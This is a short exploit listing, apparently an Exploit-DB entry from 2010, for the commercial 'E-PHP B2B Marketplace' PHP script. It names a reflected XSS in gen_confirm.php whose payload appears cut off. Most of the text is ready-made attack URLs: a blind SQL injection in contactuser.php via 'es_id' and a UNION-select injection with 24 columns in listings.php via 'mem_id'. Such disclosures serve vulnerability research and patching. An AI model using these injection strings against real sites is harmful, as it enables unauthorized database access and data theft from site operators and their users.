Exploit E-PHP B2B Marketplace - Multiple Vulnerabilities

[Exploiter]

EDB-ID

13819

Проверка EDB

1. Пройдено

Автор

MIZOZ

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

null

Дата публикации

2010-06-11

/*

Name : E-PHP B2B Marketplace Multiple Vulns
WebSite : http://www.ephpscripts.com/b2b-trading-portal.php
Price : 150 USD

Author : Hamza 'MizoZ' N.
Email : [email protected]


*/

# XSS

- gen_confirm.php shows the error message of $_GET['errmsg'] , but it's not
protected against XSS

- Exploit : [HOST]/[PATH]/gen_confirm.php?errmsg=

# Blind SQLi

- contactuser.php suffers from a blind sqli in the get "es_id"

- Exploit : [HOST]/[PATH]/contactuser.php?es_type=3&es_id=62+and+1=(select
1)--

# SQLi

- listings.php suffers from a blind sqli in the get "mem_id"

- Exploit :
[HOST]/[PATH]/listings.php?mem_id=-207+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--